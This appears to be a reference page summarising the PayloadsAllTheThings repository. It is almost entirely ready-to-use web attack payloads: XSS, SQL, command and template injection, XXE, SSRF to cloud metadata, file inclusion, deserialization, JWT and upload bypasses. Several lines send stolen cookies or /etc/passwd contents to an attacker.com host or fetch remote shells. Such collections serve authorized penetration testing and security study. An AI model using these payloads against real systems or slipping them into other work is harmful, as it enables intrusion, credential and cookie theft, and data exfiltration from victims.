PayloadsAllTheThings

PayloadsAllTheThings is a massive community-maintained GitHub repository containing attack payloads, security bypasses, and exploitation techniques organized by vulnerability type. Essential reference for pentesting, CTF challenges, and web application security research.

Repository Structure

Path	Purpose
/XSS/	Cross-site scripting payloads (reflected, stored, DOM)
/SQL Injection/	Database injection across engines (MySQL, PostgreSQL, MSSQL, Oracle, SQLite)
/Command Injection/	OS command execution payloads
/SSRF/	Server-side request forgery exploits
/XXE/	XML External Entity attack payloads
/Directory Traversal/	Path traversal and traversal bypass techniques
/File Inclusion/	LFI and RFI exploitation patterns
/Server Side Template Injection/	SSTI payloads across frameworks
/CORS/	Cross-Origin Resource Sharing misconfigurations
/CSRF/	Cross-Site Request Forgery techniques
/IDOR/	Insecure Direct Object Reference patterns
/Deserialization/	Java, PHP, Python deserialization gadgets

XSS Payloads

Reflected XSS

<!-- Basic alert -->
<script>alert('XSS')</script>

<!-- Attribute context -->
"><script>alert('XSS')</script>

<!-- Event handler -->
<img src=x onerror="alert('XSS')">

<!-- Unicode/encoding bypass -->
<script>alert(String.fromCharCode(88,83,83))</script>

<!-- SVG context -->
<svg onload="alert('XSS')">

Stored XSS

<!-- Image tag with event -->
<img src=x onerror="fetch('http://attacker.com/steal.php?cookie='+document.cookie)">

<!-- SVG injection -->
<svg/onload="new Image().src='http://attacker.com/log?c='+btoa(document.cookie)">

<!-- HTML5 data attribute -->
<div data-x="`>onclick="eval(this.dataset.x)">Click</div>

<!-- Meta redirect -->
<meta http-equiv="refresh" content="0;url=javascript:alert('XSS')">

DOM XSS

// Vulnerable pattern
document.getElementById('output').innerHTML = userInput;

// Payload (if input is: <img src=x onerror="alert('DOM XSS')">)
// Will execute

// Source → Sink patterns
// eval() injection
eval(userInput);  // Payload: alert('XSS')

// setTimeout/setInterval
setTimeout(userInput, 1000);  // Payload: alert('XSS')

SQL Injection Payloads

MySQL Injection

-- Basic union-based
' UNION SELECT 1,2,3,4-- -

-- Extract database name
' UNION SELECT 1,database(),3,4-- -

-- Extract table names
' UNION SELECT 1,GROUP_CONCAT(table_name),3,4 FROM information_schema.tables WHERE table_schema=database()-- -

-- Extract columns
' UNION SELECT 1,GROUP_CONCAT(column_name),3,4 FROM information_schema.columns WHERE table_name='users'-- -

-- Time-based blind
' AND SLEEP(5)-- -

MSSQL Injection

-- Basic union
' UNION SELECT 1,2,3,4-- -

-- Extract database name
' UNION SELECT 1,@@version,3,4-- -

-- Extract tables
' UNION SELECT 1,name,3,4 FROM sysobjects WHERE xtype='U'-- -

-- Time-based blind
'; WAITFOR DELAY '00:00:05'-- -

PostgreSQL Injection

-- Basic union
' UNION SELECT 1,2,3,4-- -

-- Extract database
' UNION SELECT 1,current_database(),3,4-- -

-- Extract tables
' UNION SELECT 1,tablename,3,4 FROM pg_tables WHERE schemaname='public'-- -

-- Time-based blind
'; SELECT CASE WHEN (1=1) THEN pg_sleep(5) ELSE pg_sleep(0) END-- -

SQLite Injection

-- Basic union
' UNION SELECT 1,2,3,4-- -

-- Extract table names
' UNION SELECT 1,name,3,4 FROM sqlite_master WHERE type='table'-- -

-- Extract columns
' PRAGMA table_info(users);

-- Time-based blind
' AND (SELECT CASE WHEN (1=1) THEN 1 ELSE (SELECT 1 UNION SELECT 2)) LIMIT 1-- -

Command Injection Payloads

# Basic command separators
; ls -la
| whoami
|| id
& cat /etc/passwd
&& whoami

# Pipe to bash
command1 | bash
command1 | sh

# Command substitution
$(whoami)
`whoami`

# Environment variable bypass
${IFS}cat${IFS}/etc/passwd

# Glob patterns
cat /etc/passw*

# Null byte injection (older systems)
cat /etc/passwd%00.txt

SSRF Payloads

# Local file access
http://127.0.0.1/admin
http://localhost:8080
http://[::1]:80/

# Internal IP ranges
http://10.0.0.1
http://172.16.0.0/12
http://192.168.0.0/16

# Cloud metadata endpoints
http://169.254.169.254/latest/meta-data/
http://metadata.google.internal/computeMetadata/v1/

# Bypass filters
http://127.1
http://localhost:80/../../admin
http://0.0.0.0

# Obfuscation
http://127.0.0.1:80/ → http://2130706433/
http://127.0.0.1 → http://0x7f.0x0.0x0.0x1

XXE Payloads

<!-- Basic XXE -->
<?xml version="1.0"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<data>&xxe;</data>

<!-- Blind XXE with exfiltration -->
<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ELEMENT foo ANY>
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
  <!ENTITY exfil SYSTEM "http://attacker.com/log?data=%xxe;">
]>
<data>&exfil;</data>

<!-- Parameter entity injection -->
<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY % file SYSTEM "file:///etc/passwd">
  <!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'http://attacker.com/log?%file;'>">
  %eval;
]>

<!-- DTD external (if not filtered) -->
<!DOCTYPE foo SYSTEM "http://attacker.com/evil.dtd">

Directory Traversal Payloads

# Basic traversal
../../../etc/passwd
..\..\..\..\windows\win.ini

# Encoded bypass
..%2F..%2F..%2Fetc%2Fpasswd
..%252F..%252F..%252Fetc%252Fpasswd (double encoding)

# Null byte injection (older systems)
../../../etc/passwd%00.jpg

# Backslash bypass
..\..\..\etc\passwd

# Overlong UTF-8
..%c0%af..%c0%af..%c0%afetc%c0%afpasswd

# URL encoding variations
%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd

File Inclusion (LFI/RFI)

Local File Inclusion

# Basic LFI
?page=../../../../etc/passwd
?file=....//....//....//etc//passwd

# Log poisoning (access logs, error logs)
?page=../../../var/log/apache2/access.log

# PHP wrappers
?file=php://filter/convert.base64-encode/resource=index.php
?file=php://input (POST data execution)
?file=data:text/plain,<?php phpinfo(); ?>

# Expect wrapper
?file=expect://whoami

Remote File Inclusion

# Basic RFI
?page=http://attacker.com/shell.php
?file=http://attacker.com/payload.txt

# Protocol smuggling
?file=http://attacker.com/payload.php%00

# FTP protocol
?file=ftp://attacker.com/shell.php

SSTI Payloads

Jinja2

{{ 7 * 7 }}  # Math evaluation
{{ config }}  # Access config
{{ self.__dict__ }}  # Object inspection
{{ ''.__class__.__mro__[1].__subclasses__() }}  # RCE chain
{{ self._TemplateReference__context }}

Twig

{{ 7 * 7 }}
{{ _self.env.registerUndefinedFilterCallback("exec")}}
{{ _self.env.getFilter("system")("id") }}

ERB (Ruby)

<%= 7 * 7 %>
<%= system("id") %>
<%= `whoami` %>

Velocity

#set($x='')
#set($rt=$x.class.forName('java.lang.Runtime'))
#set($chr=$x.class.forName('java.lang.Character'))
#set($proc=$rt.getRuntime().exec('id'))

CORS Misconfiguration

// Vulnerable backend reflects Origin header
Access-Control-Allow-Origin: *
// Or
Access-Control-Allow-Origin: [user-supplied]

// Exploit patterns
// 1. Wildcard origin
Access-Control-Allow-Origin: *
Access-Control-Allow-Credentials: true  // Invalid combo

// 2. Null origin bypass
Access-Control-Allow-Origin: null

// 3. Subdomain bypass
Origin: attacker.victim.com
// Server accepts: *.victim.com

// 4. Regex bypass
Origin: victim.com.attacker.com
// Server regex: victim.com

CSRF Payloads

<!-- Image tag (GET request) -->
<img src="http://target.com/admin/delete?id=1">

<!-- Form submission (POST) -->
<form action="http://target.com/admin/delete" method="POST">
  <input type="hidden" name="id" value="1">
  <input type="submit">
</form>
<script>document.forms[0].submit();</script>

<!-- Fetch request -->
<script>
fetch('http://target.com/admin/delete', {
  method: 'POST',
  credentials: 'include',
  body: 'id=1'
});
</script>

<!-- XMLHttpRequest -->
<script>
var xhr = new XMLHttpRequest();
xhr.open('POST', 'http://target.com/admin/delete', true);
xhr.withCredentials = true;
xhr.send('id=1');
</script>

IDOR (Insecure Direct Object Reference)

# Sequential ID enumeration
/api/users/1
/api/users/2
/api/users/3

# Parameter manipulation
/profile?id=100  → /profile?id=101, 102, 103...

# Hash/token prediction
/invoice?token=abc123  → /invoice?token=abc124...

# UUID/GUID patterns
/documents/550e8400-e29b-41d4-a716-446655440000
# Increment least significant digits

# Encoded ID manipulation
/user?id=MQ%3D%3D  (base64: MQ== = 1)
# Try MQ%3D%3D, Mi%3D%3D, Mw%3D%3D...

# Horizontal escalation
/api/orders/my-orders  (returns user 1's orders)
# Bypass: /api/orders/other-user-id/orders

Deserialization Attacks

Java (ysoserial gadgets)

# Generate payload with ysoserial
java -jar ysoserial.jar CommonsCollections5 'command' | base64

# Common gadget chains
CommonsCollections
CommonsCollections5
CommonsCollections6
Spring1
Spring2
JRMP
JMXBean

PHP

// Vulnerable pattern
unserialize($_GET['data']);

// Gadget-based RCE
O:4:"Test":2:{s:4:"func";s:6:"system";s:3:"arg";s:2:"id";}

// Magic method exploitation
__wakeup()
__destruct()
__toString()
__get()
__set()

Python Pickle

# Vulnerable
pickle.loads(user_data)

# RCE gadget
import pickle, subprocess
payload = pickle.dumps(subprocess.Popen(['id']))

JWT Attacks

// 1. Algorithm confusion (none algorithm)
// Modify header: {"alg":"none","typ":"JWT"}
// Signature: empty

// 2. Weak signature
// Crack with: hashcat, john, jwt-cracker

// 3. Public key injection
// If server uses asymmetric, swap with public key

// 4. Key confusion
// Modify alg from RS256 to HS256, use public cert as HMAC key

// 5. Expired token bypass
// Modify exp claim

// Example modified JWT
eyJhbGciOiJub25lIn0.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkFkbWluIn0.

Upload Bypass Techniques

# Extension bypass
file.php → file.php.jpg
file.php → file.jpg.php
file.php → file.phtml
file.php → file.php5
file.php → file.shtml

# MIME type bypass
Actual file: PHP shell
MIME header: image/jpeg

# Double extension
file.php.jpg
file.jpg.php

# Null byte injection (older systems)
file.php%00.jpg

# Case variation
file.PhP
file.pHp

# Content-Type header manipulation
Content-Type: image/jpeg  (for PHP file)

# Image polyglot
# Valid JPEG + PHP code appended

LDAP Injection

# Basic LDAP injection
cn=admin*)(uid=*))(&(uid=*
# Filter becomes: (&(cn=admin*)(uid=*))(&(uid=*)(password=*))

# Wildcard bypass
cn=*
uid=*
mail=*

# Blind LDAP injection
cn=admin)(|(uid=*))(&(uid=*)
# Bypass authentication

# Time-based blind
cn=admin)(|(cn=*&(objectclass=*))

NoSQL Injection

MongoDB

// String concatenation injection
db.users.find({username: "' + username + '", password: "' + password + '"})
// Payload: {"$ne": null}
// Query becomes: {username: {$ne: null}, password: {$ne: null}}

// Operator injection
username: {$gt: ""}
password: {$gt: ""}

// JavaScript evaluation
db.users.find({$where: "this.username == '" + username + "'"})
// Payload: ' || '1'=='1

// Aggregation pipeline injection
db.collection.aggregate([{$match: {username: userInput}}])

CouchDB

// Mango query injection
{"selector": {"username": {"$eq": userInput}}}
// Payload: {"$gt": null}

// Map/reduce injection
_design/users/_view/all?key={"username":"admin"}

Open Redirect

# Parameter-based
?redirect=http://attacker.com
?next=http://attacker.com
?url=http://attacker.com
?return=http://attacker.com

# Whitelist bypass
?redirect=http://legitsite.com.attacker.com
?redirect=http://attacker.com@legitsite.com
?redirect=http://attacker.com#@legitsite.com
?redirect=//attacker.com  (protocol-relative URL)

# Unicode/encoding bypass
?redirect=http://%61%74%74%61%63%6b%65%72.com
?redirect=http://attacker.com%00legitsite.com

# JavaScript protocol
?redirect=javascript:alert('XSS')

Finding PayloadsAllTheThings

• GitHub: https://github.com/swisskyrepo/PayloadsAllTheThings
• Regular Updates: Community maintains current bypasses and techniques
• Local Mirror: Clone for offline reference during assessments
• Search: Use repository search to find payloads by vulnerability type

Best Practices

• Always test in authorized environments only
• Understand the payload before using it
• Combine techniques for maximum effectiveness
• Keep the repository updated regularly
• Document payloads used in your assessments
• Modify payloads for target-specific contexts
• Validate findings with proper exploitation steps